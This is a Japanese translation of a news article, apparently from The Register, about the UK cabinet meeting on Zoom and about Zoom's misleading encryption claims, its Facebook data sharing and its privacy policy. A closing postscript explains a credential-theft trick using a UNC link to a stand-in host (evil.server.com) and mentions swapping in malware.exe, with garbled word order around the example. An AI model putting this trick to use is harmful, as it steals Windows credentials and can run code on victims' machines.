英国のボリス・ジョンソン首相は火曜日、自身のTwitterアカウントで「史上初のデジタル内閣」のスクリーンショットを共有し、セキュリティ上の懸念を引き起こした。このスクリーンショットは、英国の最高幹部や大臣たちが、英国が直面する重要な問題を議論するために、ごく標準的なZoomを使用していることを明らかにした。
ツイートでは、ZoomミーティングIDが539-544-323であることも明らかにされていましたが、幸いなことにパスワード保護されていたようです。これは良いことです。なぜなら、保護されていないZoom通話を悪意のある人物が乗っ取ることはよくあることだからです。
重要なのは、Zoomソフトウェアの使用が治安当局を激怒させた可能性が高いこと、そして英国政府が独自の安全なビデオ会議設備を備えているかどうかという疑問も生じていることです。GCHQに問い合わせたところ、これは首相官邸(ナンバー10)の問題だと回答されました。ダウニング街はコメントを控えました。
新型コロナウイルスの感染拡大で自宅待機を余儀なくされた何百万人もの人々がそうしているように、Zoomを使用するという決定は、この会議アプリのビジネスモデルとセキュリティ対策に対する懸念が高まる中で行われた。
最も注目すべきは、同社がユーザーに「エンドツーエンド暗号化」された会話を行うオプションを明示的に提供し、エンドツーエンド暗号化をサービスの主要機能として宣伝しているにもかかわらず、実際にはそのような機能は提供していないことを認めざるを得なくなったことだ。
具体的には、HTTPSウェブサイト接続の基盤となるTLSを使用しており、何もしないよりははるかに優れています。しかし、これはエンドツーエンド暗号化(E2E)ではありません。E2Eは、デバイス間のすべての通信が暗号化されることを保証するため、サービスをホストする組織でさえも接続の内容にアクセスできません。TLSを使用すると、Zoomはビデオチャットやその他のデータを傍受して復号化できます。
エンドツーエンドと言えば...
Zoomは会議主催者に「エンドツーエンド(E2E)暗号化会議を有効にする」オプションを提供し、「Zoomはエンドツーエンド暗号化接続を使用しています」と表示する緑色の南京錠アイコンを表示しているにもかかわらず、同社はその接続で転送中のデータにアクセスでき、政府に提供を強制される可能性もあるようです。つまり、これはE2Eではありません。
仕事の雑談に頼っているあのZoomアプリ?「人間のデータを血で吸う吸血鬼」が棲息している
続きを読む
会話の内容がそれほど機密性や秘密性が高くないほとんどの Zoom ユーザーにとっては、これは問題にならないが、英国内閣の会議のような場合には、真のエンドツーエンドの暗号化がないことは危険である。
質問に対し、Zoomの広報担当者は次のように認めました。「現在、Zoomビデオ会議でエンドツーエンド暗号化を有効にすることはできません。Zoomビデオ会議はTCPとUDPを組み合わせて使用します。TCP接続はTLSを使用して行われ、UDP接続はTLS接続でネゴシエートされたキーを使用してAESで暗号化されます。」
その後、Zoomは「エンドツーエンド暗号化」というフレーズが実際に何を意味するかについて、Zoom独自の説明をした。「弊社の他の資料で『エンドツーエンド』というフレーズを使用する場合、それはZoomのエンドポイントからZoomのエンドポイントまでの接続が暗号化されていることを意味します」と広報担当者は火曜日にThe Interceptに語った。
この文脈で使用されている「エンドポイント」は、Zoom クライアントだけでなく Zoom サーバーも指しており、これは意図的に誤解を招くセマンティクスの 2 番目のレイヤーです。
ユーザーのプライバシーについて言えば...
Zoomの欠陥はこれだけではない。ここ数週間の急速な普及によりZoomに注目が集まる中、同社の不透明なデータ共有ポリシーも明らかになった。
今月初めに報じたように、Zoom はユーザーの個人データや電話会議を収集して広告をターゲットにする権利を自らに与えており、追跡ベースの広告主と「不気味なほど親密な」関係を築いているようだ。
同社が収集した個人情報には、氏名、住所、その他の個人識別情報、役職名、勤務先、Facebookプロフィール、デバイスの仕様などが含まれますが、これらに限定されません。また、「クラウド録画、インスタントメッセージ、ファイル、ホワイトボードなど、サービス利用中に共有されたコンテンツ」も含まれていました。
言い換えれば、それはビデオ会議の世界の Facebook であり、ユーザーやユーザーがインストールしたあらゆるデバイスから、できる限りのデータを吸い上げていたと言えるでしょう。
Facebookと言えば、ZoomのiOSアプリは、Facebookを使ってZoomにサインインしていなくても、Facebookに分析データを送信していたことがViceの調査で判明した。これは、アプリがFacebookのGraph APIを使用しているためだ。プライバシーポリシーには、Facebookアカウントを使ってZoomにサインインするとプロフィール情報が収集されると記載されていたが、Facebookアカウントを使わない場合の対応については何も書かれていなかった。Zoomはその後、コードを修正し、ビデオ会議アプリへのサインインにFacebookアカウントを使っていない場合は、Facebookに分析データを送信しないようにした。
また、Zoom は、ユーザーが xs4all.nl などの共通のメール プロバイダーを使用していたため、あたかも同じ会社で働いているかのように、ユーザーを愚かにもまとめてしまいました。
一方、プライバシー擁護団体「アクセス・ナウ」はズームのプライバシーポリシーと慣行を詳しく調査し、その結果に満足せず、3月19日に同社に書簡を送り、他の企業と同様に、ユーザーのデータをどのように扱っているかを明確に示す透明性レポートを公開するよう求めた。
「Zoomのサービスに対する需要の高まりにより、法執行機関から悪意のあるハッカーに至るまで、個人データや機密情報を求める第三者の標的となっています」と、Access Nowの法務顧問ピーター・マイセック氏は述べています。「だからこそ、プライバシーポリシーを開示するだけでは不十分です。Zoomは、私たちの私生活や職務活動を搾取からどのように守っているのかを、今こそ明らかにすべきです。まずは、定期的な透明性レポートを作成することから始めましょう。」
Facebook APIをめぐる騒動は、月曜日にカリフォルニア州で訴訟[PDF]が提起されるに至りました。原告であるカリフォルニア州サクラメント在住のロバート・カレン氏は、Zoomが個人データの保護を怠ったとして、同社を相手取って集団訴訟を起こす予定です。
同氏は、ズームが個人情報を収集し、フェイスブックを含む第三者に提供することで、カリフォルニア州の3つの法律、すなわち不正競争防止法、消費者法的救済法、消費者プライバシー法に違反していると主張した。
「ズームがユーザーに対し、不十分なセキュリティ対策を採用し、第三者による個人情報の不正な追跡を許可すると通知していたら、ユーザーはズームアプリを積極的に使用しなかっただろう」と訴状は主張している。
つまり、Zoomの使いやすさ、信頼性、そして優れたユーザーインターフェースは、自宅待機中の人々にとってまさに天の恵みとなっている一方で、同社はその誠実さ、プライバシーポリシー、そしてビジネスモデルに関して依然として懸念材料を突きつけている。一国の政府首脳は、オンライン会議のスクリーンショットを投稿する前に、この点についてよく検討すべきだろう。®
速報です… Zoomは、以前の報道以降、プライバシーポリシーをひっそりと書き換え、次のように強調しました。「当社はお客様の個人情報を販売しません。企業、学校、個人ユーザーを問わず、当社はお客様のデータを販売しません。」
続けてこう述べています。「あなたの会議はあなたのものです。会議主催者から記録と保存を依頼されない限り、会議終了後は監視も保存もいたしません。…会議を含む当社のサービス利用から得たデータは、いかなる広告にも使用しません。zoom.usやzoom.comなどのマーケティングウェブサイトにアクセスした際に取得したデータは使用します。当社のマーケティングウェブサイトにアクセスした際に、クッキーの設定はご自身で管理できます。」
したがって、少なくとも現時点では、会議やメッセージの内容を使用してターゲット広告を生成することはないということを明確にしたようだ。
PS: Zoom には注目度追跡機能があり、会議主催者がオンにすることができます。この機能は、Zoom 会議から 30 秒以上離れると主催者に警告します。
PPS: Zoom経由で、チャットメッセージ内のURLをクリックさせることで、Windowsのローカルログインユーザー名とハッシュ化されたパスワードを盗み出すことができるようです。URLは悪意のあるSMBファイルサーバーに接続します。 のようなリンクを\\evil.server.com\foorbar.jpgクリックすると、Windowsは に接続しevil.server.com、ログインユーザーの認証情報を提供して を取得しようとしますfoobar.jpg。foobar.jpgを に置き換えるmalware.exeと、被害者のコンピュータでコードが実行される可能性があります。
